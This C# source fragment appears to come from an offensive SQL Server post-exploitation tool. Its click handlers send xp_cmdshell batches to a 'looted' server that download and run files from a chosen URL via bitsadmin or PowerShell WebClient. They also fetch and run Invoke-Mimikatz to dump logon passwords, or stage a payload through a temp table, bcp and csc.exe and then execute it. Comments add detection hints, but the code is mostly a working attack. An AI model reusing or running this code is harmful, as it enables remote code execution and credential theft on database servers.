/// <summary>
/// Click handler: passes the contents of <c>txtClearText</c> through
/// <c>EncodeBase64.ConvertTextToBase64</c> and shows the result in <c>txtBase64</c>.
/// </summary>
/// <param name="sender">Control that raised the event (unused).</param>
/// <param name="e">Routed event data (unused).</param>
private void BtnConvert_OnClick(object sender, RoutedEventArgs e)
{
    var plainInput = txtClearText.Text;
    var encodedOutput = EncodeBase64.ConvertTextToBase64(plainInput);
    txtBase64.Text = encodedOutput;
}
/// <summary>
/// Click handler for the "download and execute" action. It first checks xp_cmdshell
/// status on the server selected in <c>lstLooted</c>, then builds T-SQL batches that
/// call <c>xp_cmdshell</c> to fetch a file from <c>txtUrl</c> to <c>txtSaveLocation</c>
/// (via BITS or a PowerShell WebClient call) and run it. Batches are sent with
/// <c>RevConn</c>.
/// </summary>
/// <remarks>
/// Defender view: every step here runs as an operating-system command issued through
/// xp_cmdshell, so the activity is visible as command-shell child processes of the SQL
/// Server service. The BITS job name "WarSQLiJob" is a fixed literal on this page.
/// Keeping xp_cmdshell disabled and the SQL login unprivileged removes the primitive
/// this handler depends on.
/// </remarks>
/// <param name="sender">Control that raised the event (unused).</param>
/// <param name="e">Routed event data (unused).</param>
private void btnDownloadExecute_Click(object sender, RoutedEventArgs e)
{
    // Local copies of the cached state; this method never writes them back to cmdControl.
    var isActivated = cmdControl.isActivated;
    var isExecuted = cmdControl.isExecuted;
    if (isActivated == false && isExecuted == false)
    {
        var enableXpCmdShell = new EnableXpCmdShell { LootedServer = lstLooted.SelectedItem.ToString() };
        try
        {
            // Synchronous Invoke: the locals are updated before the check further down.
            Dispatcher.Invoke((Action) delegate
            {
                // Implementation not visible here; presumably queries/enables xp_cmdshell - TODO confirm.
                enableXpCmdShell.XpCmdShellStatus();
                txtStatus.AppendText(enableXpCmdShell.Result);
                // Success is detected by substring match against the localized "XPCmdShell2" resource.
                var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2");
                var contains = enableXpCmdShell.Result.Contains(cmdLandResult);
                if (contains == true)
                {
                    isActivated = true;
                    isExecuted = true;
                }
            });
        }
        catch (Exception)
        {
            // The caught exception itself is discarded; only CmdException is shown.
            Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { txtStatus.AppendText(enableXpCmdShell.CmdException); });
        }
    }
    if (isExecuted == true && isActivated == true)
    {
        if (rdBits.IsChecked == true)
        {
            // BITS path: start the BITS service, run a bitsadmin transfer, then run the saved file.
            try
            {
                // Nothing is sent (and no message is shown) when either text box is empty.
                if (!string.IsNullOrEmpty(txtUrl.Text) && !string.IsNullOrEmpty(txtSaveLocation.Text))
                {
                    var _execCode = string.Empty;
                    // NOTE(review): BeginInvoke only queues the delegate, so the enclosing catch
                    // presumably never sees exceptions thrown inside it - confirm.
                    Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                    {
                        // NOTE(review): _execCode is only appended to in this branch, never reset,
                        // so each later RevConn call is handed the earlier statements again.
                        _execCode += "USE [master]\r\n";
                        _execCode += "EXEC xp_cmdshell '\"net start BITS\"';\r\n";
                        txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload1")}");
                        // Meaning of RevConn's second argument is not visible in this section.
                        RevConn(_execCode, 0);
                        _execCode += "USE [master]\r\n";
                        // txtUrl.Text and txtSaveLocation.Text are concatenated unescaped into the
                        // T-SQL string literal and the command line.
                        // Detection: a bitsadmin /transfer job named "WarSQLiJob" started under the
                        // SQL Server service.
                        _execCode += "EXEC xp_cmdshell '\"bitsadmin /transfer WarSQLiJob /download /priority normal " + txtUrl.Text + " " + txtSaveLocation.Text + "\"';\r\n";
                        txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload2")}");
                        RevConn(_execCode, 0);
                        _execCode += "USE [master]\r\n";
                        // Runs whatever was written to the save location.
                        _execCode += "EXEC xp_cmdshell '\"" + txtSaveLocation.Text + "\"';\r\n";
                        txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload3")}");
                        RevConn(_execCode, 0);
                    });
                }
            }
            catch (Exception exp)
            {
                // Output order per the format string: GeneralError1, GeneralError2, newline, exp.Message.
                Dispatcher.Invoke((Action) delegate
                {
                    txtStatus.AppendText(string.Format("{2}{3}{0}{1}",
                        Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
                });
            }
        }
        else
        {
            // PowerShell path: no try/catch and no empty-input check, unlike the BITS path.
            Dispatcher.Invoke((Action) delegate
            {
                var clearText = "(new-object System.Net.WebClient).DownloadFile('" + txtUrl.Text + "', '" + txtSaveLocation.Text + "')";
                // ConvertTextToBase64 is defined elsewhere; presumably it returns a complete
                // encoded PowerShell command line, since the result is passed to xp_cmdshell
                // as-is - TODO confirm.
                clearText = EncodeBase64.ConvertTextToBase64(clearText);
                var _execCode = string.Empty;
                _execCode += "EXEC xp_cmdshell '" + clearText + "'";
                txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload5")}");
                RevConn(_execCode, 1);
                // Here the buffer is reset before the execute step.
                _execCode = string.Empty;
                _execCode += "EXEC xp_cmdshell '" + txtSaveLocation.Text + "'\r\n";
                txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload3")}");
                RevConn(_execCode, 0);
            });
        }
    }
}
/// <summary>
/// Click handler for the Mimikatz action. After the same xp_cmdshell status check used
/// by the download handler, it either stages a local payload file on the selected
/// server through a temporary SQL table and builds/runs it there (<c>rdLocal</c>
/// checked), or has the server fetch and run Invoke-Mimikatz from <c>txtUrl</c> via
/// PowerShell.
/// </summary>
/// <remarks>
/// Defender view, from the literals on this page: a table named WarSQLiTemp; bcp.exe
/// queryout writing C:\Users\MSSQLSERVER\&lt;12 chars&gt;.txt, where the characters come from
/// 0-9 and A-Y without Q (Random.Next's upper bound is exclusive, so the final 'Z' is
/// never picked); csc.exe producing C:\Users\MSSQLSERVER\eyup.exe; and cmd.exe running
/// it, all issued through xp_cmdshell. The remote path requests sekurlsa::logonPasswords,
/// i.e. credential material read from memory on the database host.
/// </remarks>
/// <param name="sender">Control that raised the event (unused).</param>
/// <param name="e">Routed event data (unused).</param>
private void btnRun_Click(object sender, RoutedEventArgs e)
{
    // Local copies of the cached state; this method never writes them back to cmdControl.
    var isActivated = cmdControl.isActivated;
    var isExecuted = cmdControl.isExecuted;
    if (isActivated == false && isExecuted == false)
    {
        var enableXpCmdShell = new EnableXpCmdShell { LootedServer = lstLooted.SelectedItem.ToString() };
        try
        {
            // Synchronous Invoke: the locals are updated before the check further down.
            Dispatcher.Invoke((Action) delegate
            {
                // Implementation not visible here; presumably queries/enables xp_cmdshell - TODO confirm.
                enableXpCmdShell.XpCmdShellStatus();
                txtStatus.AppendText(enableXpCmdShell.Result);
                // Success is detected by substring match against the localized "XPCmdShell2" resource.
                var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2");
                var contains = enableXpCmdShell.Result.Contains(cmdLandResult);
                if (contains == true)
                {
                    isActivated = true;
                    isExecuted = true;
                }
            });
        }
        catch (Exception)
        {
            // The caught exception itself is discarded; only CmdException is shown.
            Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { txtStatus.AppendText(enableXpCmdShell.CmdException); });
        }
    }
    if (isExecuted == true && isActivated == true)
    {
        if (rdLocal.IsChecked == true)
        {
            // Written later inside a queued delegate and read by a delegate queued after it.
            var savedFileNAme = string.Empty;
            // Read outside any try block, so a missing file throws out of the handler.
            // The file is later handed to csc.exe, so it is presumably C# source - TODO confirm.
            var mimiBinary = File.ReadAllBytes(@"Scanner\Mimikatz\1.txt");
            // Step 1: create the staging table and insert the payload bytes.
            try
            {
                // NOTE(review): BeginInvoke only queues the delegate, so the catch blocks around
                // these calls presumably never see exceptions thrown inside them - confirm.
                Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                {
                    _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
                    _postExploitation.CreateBinaryTable();
                    txtStatus.AppendText(_postExploitation.ExploitResult);
                    _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
                    _postExploitation.BinaryData = mimiBinary;
                    _postExploitation.InsertBinaryData();
                    txtStatus.AppendText(_postExploitation.ExploitResult);
                });
            }
            catch (Exception exp)
            {
                // Output order per the format string: GeneralError1, GeneralError2, newline, exp.Message.
                Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2"))); });
            }
            // Step 2: export the table contents to a randomly named .txt file with bcp.exe.
            try
            {
                _postExploitation.ExploitCode = string.Empty;
                var rnd = new Random();
                var chr = "0123456789ABCDEFGHIJKLMNOPRSTUVWXYZ".ToCharArray();
                var randomFileName = string.Empty;
                for (int i = 0; i < 12; i++)
                {
                    // Next(0, Length - 1) has an exclusive upper bound: the last character is never chosen.
                    randomFileName += chr[rnd.Next(0, chr.Length - 1)].ToString();
                }
                var extension = "txt";
                _postExploitation.ExploitCode += "DECLARE @cmd VARCHAR(8000);";
                // -T makes bcp use a trusted connection; the output directory is a fixed literal.
                _postExploitation.ExploitCode += "SET @cmd = 'bcp.exe \"SELECT CAST(binaryTable AS VARCHAR(MAX)) FROM WarSQLiTemp\" queryout \"C:\\Users\\MSSQLSERVER\\" + randomFileName + "." + extension + "\" -c -T';";
                _postExploitation.ExploitCode += "EXEC xp_cmdshell @cmd;";
                Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                {
                    _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
                    _postExploitation.RunExploit();
                    txtStatus.AppendText(_postExploitation.ExploitResult);
                    // Reported as saved regardless of what RunExploit returned.
                    txtStatus.AppendText("File Saved: C:\\Users\\MSSQLSERVER\\" + randomFileName + "." + extension);
                    savedFileNAme = "C:\\Users\\MSSQLSERVER\\" + randomFileName + "." + extension;
                });
            }
            catch (Exception exp)
            {
                Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2"))); });
            }
            // Step 3: drop the staging table. The exported .txt and eyup.exe are not removed
            // anywhere in this method.
            try
            {
                Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                {
                    _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
                    _postExploitation.RemoveTempTable();
                    txtStatus.AppendText(_postExploitation.ExploitResult);
                });
            }
            catch (Exception exp)
            {
                Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2"))); });
            }
            // Step 4: build the exported file with the .NET Framework compiler, then run the output.
            try
            {
                Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                {
                    _postExploitation.ExploitCode = string.Empty;
                    // Detection: csc.exe launched by the SQL Server service with /out: pointing
                    // at a user-profile directory.
                    _postExploitation.ExploitCode += "EXEC xp_cmdshell 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /out:C:\\Users\\MSSQLSERVER\\eyup.exe " + savedFileNAme + "';";
                    _postExploitation.RunExploit();
                    txtStatus.AppendText(_postExploitation.ExploitResult);
                });
                Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                {
                    _postExploitation.ExploitCode = string.Empty;
                    _postExploitation.ExploitCode += "EXEC xp_cmdshell 'cmd.exe /c C:\\Users\\MSSQLSERVER\\eyup.exe';";
                    _postExploitation.RunExploit();
                    txtStatus.AppendText(_postExploitation.ExploitResult);
                });
            }
            catch (Exception exp)
            {
                Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2"))); });
            }
        }
        else
        {
            // Remote path: nothing is staged in SQL; the script is fetched from txtUrl at run time.
            try
            {
                Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                {
                    _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
                    // txtUrl.Text is concatenated unescaped and is not checked for emptiness here.
                    var sendMimiText = "IEX (New-Object Net.WebClient).DownloadString('" + txtUrl.Text + "'); Invoke-Mimikatz -Command \"privilege::debug sekurlsa::logonPasswords exit\"";
                    // ConvertTextToBase64 is defined elsewhere; presumably it returns a complete
                    // encoded PowerShell command line - TODO confirm. If so, PowerShell script
                    // block logging would still record the decoded text.
                    var psBs64 = EncodeBase64.ConvertTextToBase64(sendMimiText);
                    _postExploitation.ExploitCode = string.Empty;
                    _postExploitation.ExploitCode += "EXEC xp_cmdshell '" + psBs64 + "';";
                    _postExploitation.RunExploit();
                    txtStatus.AppendText(_postExploitation.ExploitResult);
                });
            }
            catch (Exception exp)
            {
                Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate { txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2"))); });
            }
        }
    }
}